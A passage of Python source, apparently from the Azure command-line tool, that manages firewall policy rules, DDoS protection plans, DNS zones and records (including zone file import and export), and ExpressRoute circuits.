waf_policy = client.get(resource_group_name, policy_name)
delete_rule_set = None
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type or rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
delete_rule_set = rule_set
break
# Remove one rule from rule group
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg is None:
raise CLIError('Rule set group [ {} ] not found.'.format(rule_group_name))
rule_set.rule_group_overrides.remove(rg)
if delete_rule_set:
waf_policy.managed_rules.managed_rule_sets.remove(delete_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule OwaspCrsExclusionEntry
def add_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name,
match_variable, selector_match_operator, selector):
OwaspCrsExclusionEntry = cmd.get_models('OwaspCrsExclusionEntry')
exclusion_entry = OwaspCrsExclusionEntry(match_variable=match_variable,
selector_match_operator=selector_match_operator,
selector=selector)
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions.append(exclusion_entry)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def remove_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions = []
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationSecurityGroups
def create_asg(cmd, client, resource_group_name, application_security_group_name, location=None, tags=None):
ApplicationSecurityGroup = cmd.get_models('ApplicationSecurityGroup')
asg = ApplicationSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, application_security_group_name, asg)
def update_asg(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region DdosProtectionPlans
def create_ddos_plan(cmd, resource_group_name, ddos_plan_name, location=None, tags=None, vnets=None):
from azure.cli.core.commands import LongRunningOperation
ddos_client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
ddos_protection_plan = cmd.get_models('DdosProtectionPlan')()
if location:
ddos_protection_plan.location = location
if tags:
ddos_protection_plan.tags = tags
if not vnets:
# if no VNETs can do a simple PUT
return ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)
# if VNETs specified, have to create the protection plan and then add the VNETs
plan_id = LongRunningOperation(cmd.cli_ctx)(
ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)).id
SubResource = cmd.get_models('SubResource')
logger.info('Attempting to attach VNets to newly created DDoS protection plan.')
for vnet_subresource in vnets:
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
id_parts = parse_resource_id(vnet_subresource.id)
vnet = vnet_client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=plan_id)
vnet_client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return ddos_client.get(resource_group_name, ddos_plan_name)
def update_ddos_plan(cmd, instance, tags=None, vnets=None):
SubResource = cmd.get_models('SubResource')
if tags is not None:
instance.tags = tags
if vnets is not None:
logger.info('Attempting to update the VNets attached to the DDoS protection plan.')
vnet_ids = set([])
if len(vnets) == 1 and not vnets[0]:
pass
else:
vnet_ids = {x.id for x in vnets}
existing_vnet_ids = {x.id for x in instance.virtual_networks} if instance.virtual_networks else set([])
client = network_client_factory(cmd.cli_ctx).virtual_networks
for vnet_id in vnet_ids.difference(existing_vnet_ids):
logger.info("Adding VNet '%s' to plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=instance.id)
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
for vnet_id in existing_vnet_ids.difference(vnet_ids):
logger.info("Removing VNet '%s' from plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = None
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return instance
def list_ddos_plans(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
# endregion
# region DNS Commands
# add delegation name server record for the created child zone in it's parent zone.
def add_dns_delegation(cmd, child_zone, parent_zone, child_rg, child_zone_name):
"""
:param child_zone: the zone object corresponding to the child that is created.
:param parent_zone: the parent zone name / FQDN of the parent zone.
if parent zone name is mentioned, assume current subscription and resource group.
:param child_rg: resource group of the child zone
:param child_zone_name: name of the child zone
"""
import sys
from azure.core.exceptions import HttpResponseError
parent_rg = child_rg
parent_subscription_id = None
parent_zone_name = parent_zone
if is_valid_resource_id(parent_zone):
id_parts = parse_resource_id(parent_zone)
parent_rg = id_parts['resource_group']
parent_subscription_id = id_parts['subscription']
parent_zone_name = id_parts['name']
if all([parent_zone_name, parent_rg, child_zone_name, child_zone]) and child_zone_name.endswith(parent_zone_name):
record_set_name = child_zone_name.replace('.' + parent_zone_name, '')
try:
for dname in child_zone.name_servers:
add_dns_ns_record(cmd, parent_rg, parent_zone_name, record_set_name, dname, parent_subscription_id)
print('Delegation added succesfully in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print('Could not add delegation in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
def create_dns_zone(cmd, client, resource_group_name, zone_name, parent_zone_name=None, tags=None,
if_none_match=False, zone_type='Public', resolution_vnets=None, registration_vnets=None):
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
zone = Zone(location='global', tags=tags)
if hasattr(zone, 'zone_type'):
zone.zone_type = zone_type
zone.registration_virtual_networks = registration_vnets
zone.resolution_virtual_networks = resolution_vnets
created_zone = client.create_or_update(resource_group_name, zone_name, zone,
if_none_match='*' if if_none_match else None)
if cmd.supported_api_version(min_api='2016-04-01') and parent_zone_name is not None:
logger.info('Attempting to add delegation in the parent zone')
add_dns_delegation(cmd, created_zone, parent_zone_name, resource_group_name, zone_name)
return created_zone
def update_dns_zone(instance, tags=None, zone_type=None, resolution_vnets=None, registration_vnets=None):
if tags is not None:
instance.tags = tags
if zone_type:
instance.zone_type = zone_type
if resolution_vnets == ['']:
instance.resolution_virtual_networks = None
elif resolution_vnets:
instance.resolution_virtual_networks = resolution_vnets
if registration_vnets == ['']:
instance.registration_virtual_networks = None
elif registration_vnets:
instance.registration_virtual_networks = registration_vnets
return instance
def list_dns_zones(cmd, resource_group_name=None):
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).zones
if resource_group_name:
return ncf.list_by_resource_group(resource_group_name)
return ncf.list()
def create_dns_record_set(cmd, resource_group_name, zone_name, record_set_name, record_set_type,
metadata=None, if_match=None, if_none_match=None, ttl=3600, target_resource=None):
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
SubResource = cmd.get_models('SubResource', resource_type=ResourceType.MGMT_NETWORK)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = RecordSet(
ttl=ttl,
metadata=metadata,
target_resource=SubResource(id=target_resource) if target_resource else None
)
return client.create_or_update(resource_group_name, zone_name, record_set_name,
record_set_type, record_set, if_match=if_match,
if_none_match='*' if if_none_match else None)
def list_dns_record_set(client, resource_group_name, zone_name, record_type=None):
if record_type:
return client.list_by_type(resource_group_name, zone_name, record_type)
return client.list_by_dns_zone(resource_group_name, zone_name)
def update_dns_record_set(instance, cmd, metadata=None, target_resource=None):
if metadata is not None:
instance.metadata = metadata
if target_resource == '':
instance.target_resource = None
elif target_resource is not None:
SubResource = cmd.get_models('SubResource')
instance.target_resource = SubResource(id=target_resource)
return instance
def _type_to_property_name(key):
type_dict = {
'a': 'a_records',
'aaaa': 'aaaa_records',
'caa': 'caa_records',
'cname': 'cname_record',
'mx': 'mx_records',
'ns': 'ns_records',
'ptr': 'ptr_records',
'soa': 'soa_record',
'spf': 'txt_records',
'srv': 'srv_records',
'txt': 'txt_records',
}
return type_dict[key.lower()]
def export_zone(cmd, resource_group_name, zone_name, file_name=None):
from time import localtime, strftime
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
record_sets = client.record_sets.list_by_dns_zone(resource_group_name, zone_name)
zone_obj = OrderedDict({
'$origin': zone_name.rstrip('.') + '.',
'resource-group': resource_group_name,
'zone-name': zone_name.rstrip('.'),
'datetime': strftime('%a, %d %b %Y %X %z', localtime())
})
for record_set in record_sets:
record_type = record_set.type.rsplit('/', 1)[1].lower()
record_set_name = record_set.name
record_data = getattr(record_set, _type_to_property_name(record_type), None)
# ignore empty record sets
if not record_data:
continue
if not isinstance(record_data, list):
record_data = [record_data]
if record_set_name not in zone_obj:
zone_obj[record_set_name] = OrderedDict()
for record in record_data:
record_obj = {'ttl': record_set.ttl}
if record_type not in zone_obj[record_set_name]:
zone_obj[record_set_name][record_type] = []
if record_type == 'aaaa':
record_obj.update({'ip': record.ipv6_address})
elif record_type == 'a':
record_obj.update({'ip': record.ipv4_address})
elif record_type == 'caa':
record_obj.update({'val': record.value, 'tag': record.tag, 'flags': record.flags})
elif record_type == 'cname':
record_obj.update({'alias': record.cname.rstrip('.') + '.'})
elif record_type == 'mx':
record_obj.update({'preference': record.preference, 'host': record.exchange.rstrip('.') + '.'})
elif record_type == 'ns':
record_obj.update({'host': record.nsdname.rstrip('.') + '.'})
elif record_type == 'ptr':
record_obj.update({'host': record.ptrdname.rstrip('.') + '.'})
elif record_type == 'soa':
record_obj.update({
'mname': record.host.rstrip('.') + '.',
'rname': record.email.rstrip('.') + '.',
'serial': int(record.serial_number), 'refresh': record.refresh_time,
'retry': record.retry_time, 'expire': record.expire_time,
'minimum': record.minimum_ttl
})
zone_obj['$ttl'] = record.minimum_ttl
elif record_type == 'srv':
record_obj.update({'priority': record.priority, 'weight': record.weight,
'port': record.port, 'target': record.target.rstrip('.') + '.'})
elif record_type == 'txt':
record_obj.update({'txt': ''.join(record.value)})
zone_obj[record_set_name][record_type].append(record_obj)
zone_file_content = make_zone_file(zone_obj)
print(zone_file_content)
if file_name:
try:
with open(file_name, 'w') as f:
f.write(zone_file_content)
except IOError:
raise CLIError('Unable to export to file: {}'.format(file_name))
# pylint: disable=too-many-return-statements, inconsistent-return-statements
def _build_record(cmd, data):
AaaaRecord, ARecord, CaaRecord, CnameRecord, MxRecord, NsRecord, PtrRecord, SoaRecord, SrvRecord, TxtRecord = \
cmd.get_models('AaaaRecord', 'ARecord', 'CaaRecord', 'CnameRecord', 'MxRecord', 'NsRecord',
'PtrRecord', 'SoaRecord', 'SrvRecord', 'TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_type = data['delim'].lower()
try:
if record_type == 'aaaa':
return AaaaRecord(ipv6_address=data['ip'])
if record_type == 'a':
return ARecord(ipv4_address=data['ip'])
if (record_type == 'caa' and
supported_api_version(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS, min_api='2018-03-01-preview')):
return CaaRecord(value=data['val'], flags=int(data['flags']), tag=data['tag'])
if record_type == 'cname':
return CnameRecord(cname=data['alias'])
if record_type == 'mx':
return MxRecord(preference=data['preference'], exchange=data['host'])
if record_type == 'ns':
return NsRecord(nsdname=data['host'])
if record_type == 'ptr':
return PtrRecord(ptrdname=data['host'])
if record_type == 'soa':
return SoaRecord(host=data['host'], email=data['email'], serial_number=data['serial'],
refresh_time=data['refresh'], retry_time=data['retry'], expire_time=data['expire'],
minimum_ttl=data['minimum'])
if record_type == 'srv':
return SrvRecord(
priority=int(data['priority']), weight=int(data['weight']), port=int(data['port']),
target=data['target'])
if record_type in ['txt', 'spf']:
text_data = data['txt']
return TxtRecord(value=text_data) if isinstance(text_data, list) else TxtRecord(value=[text_data])
except KeyError as ke:
raise CLIError("The {} record '{}' is missing a property. {}"
.format(record_type, data['name'], ke))
# pylint: disable=too-many-statements
def import_zone(cmd, resource_group_name, zone_name, file_name):
from azure.cli.core.util import read_file_content
from azure.core.exceptions import HttpResponseError
import sys
logger.warning("In the future, zone name will be case insensitive.")
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
from azure.cli.core.azclierror import FileOperationError, UnclassifiedUserFault
try:
file_text = read_file_content(file_name)
except FileNotFoundError:
raise FileOperationError("No such file: " + str(file_name))
except IsADirectoryError:
raise FileOperationError("Is a directory: " + str(file_name))
except PermissionError:
raise FileOperationError("Permission denied: " + str(file_name))
except OSError as e:
raise UnclassifiedUserFault(e)
zone_obj = parse_zone_file(file_text, zone_name)
origin = zone_name
record_sets = {}
for record_set_name in zone_obj:
for record_set_type in zone_obj[record_set_name]:
record_set_obj = zone_obj[record_set_name][record_set_type]
if record_set_type == 'soa':
origin = record_set_name.rstrip('.')
if not isinstance(record_set_obj, list):
record_set_obj = [record_set_obj]
for entry in record_set_obj:
record_set_ttl = entry['ttl']
record_set_key = '{}{}'.format(record_set_name.lower(), record_set_type)
record = _build_record(cmd, entry)
if not record:
logger.warning('Cannot import %s. RecordType is not found. Skipping...', entry['delim'].lower())
continue
record_set = record_sets.get(record_set_key, None)
if not record_set:
# Workaround for issue #2824
relative_record_set_name = record_set_name.rstrip('.')
if not relative_record_set_name.endswith(origin):
logger.warning(
'Cannot import %s. Only records relative to origin may be '
'imported at this time. Skipping...', relative_record_set_name)
continue
record_set = RecordSet(ttl=record_set_ttl)
record_sets[record_set_key] = record_set
_add_record(record_set, record, record_set_type,
is_list=record_set_type.lower() not in ['soa', 'cname'])
total_records = 0
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = rs_name[:-(len(origin) + 1)] if rs_name != origin else '@'
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
total_records += record_count
cum_records = 0
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
print('== BEGINNING ZONE IMPORT: {} ==\n'.format(zone_name), file=sys.stderr)
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
client.zones.create_or_update(resource_group_name, zone_name, Zone(location='global'))
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = '@' if rs_name == origin else rs_name
if rs_name.endswith(origin):
rs_name = rs_name[:-(len(origin) + 1)]
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
if rs_name == '@' and rs_type == 'soa':
root_soa = client.record_sets.get(resource_group_name, zone_name, '@', 'SOA')
rs.soa_record.host = root_soa.soa_record.host
rs_name = '@'
elif rs_name == '@' and rs_type == 'ns':
root_ns = client.record_sets.get(resource_group_name, zone_name, '@', 'NS')
root_ns.ttl = rs.ttl
rs = root_ns
rs_type = rs.type.rsplit('/', 1)[1]
try:
client.record_sets.create_or_update(
resource_group_name, zone_name, rs_name, rs_type, rs)
cum_records += record_count
print("({}/{}) Imported {} records of type '{}' and name '{}'"
.format(cum_records, total_records, record_count, rs_type, rs_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print("\n== {}/{} RECORDS IMPORTED SUCCESSFULLY: '{}' =="
.format(cum_records, total_records, zone_name), file=sys.stderr)
def add_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
ttl=3600, if_none_match=None):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
ttl=3600, if_none_match=None):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name, 'arecords',
ttl=ttl, if_none_match=if_none_match)
def add_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value, flags, tag,
ttl=3600, if_none_match=None):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname, ttl=3600, if_none_match=None):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, ttl=ttl, if_none_match=if_none_match)
def add_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
ttl=3600, if_none_match=None):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
subscription_id=None, ttl=3600, if_none_match=None):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
subscription_id=subscription_id, ttl=ttl, if_none_match=if_none_match)
def add_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname, ttl=3600, if_none_match=None):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def update_dns_soa_record(cmd, resource_group_name, zone_name, host=None, email=None,
serial_number=None, refresh_time=None, retry_time=None, expire_time=None,
minimum_ttl=3600, if_none_match=None):
record_set_name = '@'
record_type = 'soa'
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record = record_set.soa_record
record.host = host or record.host
record.email = email or record.email
record.serial_number = serial_number or record.serial_number
record.refresh_time = refresh_time or record.refresh_time
record.retry_time = retry_time or record.retry_time
record.expire_time = expire_time or record.expire_time
record.minimum_ttl = minimum_ttl or record.minimum_ttl
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, if_none_match=if_none_match)
def add_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, if_none_match=None):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def add_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value, if_none_match=None):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
long_text = ''.join(x for x in record.value)
original_len = len(long_text)
record.value = []
while len(long_text) > 255:
record.value.append(long_text[:255])
long_text = long_text[255:]
record.value.append(long_text)
final_str = ''.join(record.value)
final_len = len(final_str)
assert original_len == final_len
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def remove_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
keep_empty_record_set=False):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
keep_empty_record_set=False):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value,
flags, tag, keep_empty_record_set=False):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname,
keep_empty_record_set=False):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, keep_empty_record_set=keep_empty_record_set)
def remove_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
keep_empty_record_set=False):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, keep_empty_record_set=False):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value,
keep_empty_record_set=False):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def _check_a_record_exist(record, exist_list):
for r in exist_list:
if r.ipv4_address == record.ipv4_address:
return True
return False
def _check_aaaa_record_exist(record, exist_list):
for r in exist_list:
if r.ipv6_address == record.ipv6_address:
return True
return False
def _check_caa_record_exist(record, exist_list):
for r in exist_list:
if (r.flags == record.flags and
r.tag == record.tag and
r.value == record.value):
return True
return False
def _check_cname_record_exist(record, exist_list):
for r in exist_list:
if r.cname == record.cname:
return True
return False
def _check_mx_record_exist(record, exist_list):
for r in exist_list:
if (r.preference == record.preference and
r.exchange == record.exchange):
return True
return False
def _check_ns_record_exist(record, exist_list):
for r in exist_list:
if r.nsdname == record.nsdname:
return True
return False
def _check_ptr_record_exist(record, exist_list):
for r in exist_list:
if r.ptrdname == record.ptrdname:
return True
return False
def _check_srv_record_exist(record, exist_list):
for r in exist_list:
if (r.priority == record.priority and
r.weight == record.weight and
r.port == record.port and
r.target == record.target):
return True
return False
def _check_txt_record_exist(record, exist_list):
for r in exist_list:
if r.value == record.value:
return True
return False
def _record_exist_func(record_type):
return globals()["_check_{}_record_exist".format(record_type)]
def _add_record(record_set, record, record_type, is_list=False):
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is None:
setattr(record_set, record_property, [])
record_list = getattr(record_set, record_property)
_record_exist = _record_exist_func(record_type)
if not _record_exist(record, record_list):
record_list.append(record)
else:
setattr(record_set, record_property, record)
def _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=True, subscription_id=None, ttl=None, if_none_match=None):
from azure.core.exceptions import HttpResponseError
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS,
subscription_id=subscription_id).record_sets
try:
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
except HttpResponseError:
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_set = RecordSet(ttl=3600)
if ttl is not None:
record_set.ttl = ttl
_add_record(record_set, record, record_type, is_list)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name,
record_type, record_set,
if_none_match='*' if if_none_match else None)
def _remove_record(cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set, is_list=True):
ncf = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is not None:
keep_list = [r for r in record_list
if not dict_matches_filter(r.__dict__, record.__dict__)]
if len(keep_list) == len(record_list):
raise CLIError('Record {} not found.'.format(str(record)))
setattr(record_set, record_property, keep_list)
else:
setattr(record_set, record_property, None)
if is_list:
records_remaining = len(getattr(record_set, record_property))
else:
records_remaining = 1 if getattr(record_set, record_property) is not None else 0
if not records_remaining and not keep_empty_record_set:
logger.info('Removing empty %s record set: %s', record_type, record_set_name)
return ncf.delete(resource_group_name, zone_name, record_set_name, record_type)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name, record_type, record_set)
def dict_matches_filter(d, filter_dict):
sentinel = object()
return all(not filter_dict.get(key, None) or
str(filter_dict[key]) == str(d.get(key, sentinel)) or
lists_match(filter_dict[key], d.get(key, []))
for key in filter_dict)
def lists_match(l1, l2):
try:
return Counter(l1) == Counter(l2) # pylint: disable=too-many-function-args
except TypeError:
return False
# endregion
# region ExpressRoutes
def create_express_route(cmd, circuit_name, resource_group_name, bandwidth_in_mbps, peering_location,
service_provider_name, location=None, tags=None, no_wait=False,
sku_family=None, sku_tier=None, allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
ExpressRouteCircuit, ExpressRouteCircuitSku, ExpressRouteCircuitServiceProviderProperties, SubResource = \
cmd.get_models(
'ExpressRouteCircuit', 'ExpressRouteCircuitSku', 'ExpressRouteCircuitServiceProviderProperties',
'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_circuits
sku_name = '{}_{}'.format(sku_tier, sku_family)
circuit = ExpressRouteCircuit(
location=location, tags=tags,
service_provider_properties=ExpressRouteCircuitServiceProviderProperties(
service_provider_name=service_provider_name,
peering_location=peering_location,
bandwidth_in_mbps=bandwidth_in_mbps if not express_route_port else None),
sku=ExpressRouteCircuitSku(name=sku_name, tier=sku_tier, family=sku_family),
allow_global_reach=allow_global_reach,
bandwidth_in_gbps=(int(bandwidth_in_mbps) / 1000) if express_route_port else None
)
if cmd.supported_api_version(min_api='2010-07-01') and allow_classic_operations is not None:
circuit.allow_classic_operations = allow_classic_operations
if cmd.supported_api_version(min_api='2018-08-01') and express_route_port:
circuit.express_route_port = SubResource(id=express_route_port)
circuit.service_provider_properties = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, circuit_name, circuit)
def update_express_route(instance, cmd, bandwidth_in_mbps=None, peering_location=None,
service_provider_name=None, sku_family=None, sku_tier=None, tags=None,
allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
with cmd.update_context(instance) as c:
c.set_param('allow_classic_operations', allow_classic_operations)
c.set_param('tags', tags)
c.set_param('allow_global_reach', allow_global_reach)
with cmd.update_context(instance.sku) as c:
c.set_param('family', sku_family)
c.set_param('tier', sku_tier)
with cmd.update_context(instance.service_provider_properties) as c:
c.set_param('peering_location', peering_location)
c.set_param('service_provider_name', service_provider_name)
if express_route_port is not None:
SubResource = cmd.get_models('SubResource')
instance.express_route_port = SubResource(id=express_route_port)
instance.service_provider_properties = None
if bandwidth_in_mbps is not None:
if not instance.express_route_port:
instance.service_provider_properties.bandwith_in_mbps = float(bandwidth_in_mbps)
else:
instance.bandwidth_in_gbps = (float(bandwidth_in_mbps) / 1000)
return instance
def create_express_route_peering_connection(cmd, resource_group_name, circuit_name, peering_name, connection_name,
peer_circuit, address_prefix, authorization_key=None):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
ExpressRouteCircuitConnection, SubResource = cmd.get_models('ExpressRouteCircuitConnection', 'SubResource')
source_circuit = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
